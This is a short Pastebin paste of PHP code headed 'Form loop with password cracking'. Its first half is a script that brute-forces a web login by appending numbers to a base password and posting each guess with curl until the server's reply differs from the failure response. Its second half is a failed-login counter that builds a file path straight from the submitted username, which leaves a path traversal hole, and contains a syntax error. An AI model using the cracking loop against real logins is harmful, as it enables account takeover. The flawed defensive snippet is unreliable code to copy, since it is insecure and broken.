Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Form loop with password cracking
- $username = "johnsmith";
- $pass_base = "eatdog";
- $url = "the url the form submits to";
- $failed = ""; //the response returned by the server when login fails
- for ($i=10; $i < 100; $i++)
- {
- $password = $pass_base . $i;
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL,$url);
- curl_setopt($ch,CURLOPT_POST,true);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
- //set the POST parameters
- $data = curl_exec($ch);
- curl_close($ch);
- if ($data != $failed) //analyze the returned data
- {
- echo $password; //this is your password
- break;
- }
- }
- $count = file_get_contents('/some/writable/dir/'$_POST['username']);
- if (!$count) {
- $count = 0;
- }
- if ($count > 5) {
- print "Naughty!"; // or add a CAPTCHA or something
- exit;
- }
- $success = checkLogin($_POST['username'], $_POST['password']);
- if ($success) {
- // set cookies, send them away with header('location:blah.php'); exit
- } else {
- $count ++;
- file_put_contents('/some/writable/dir/'$_POST['username'], $count);
- }
Add Comment
Please, Sign In to add comment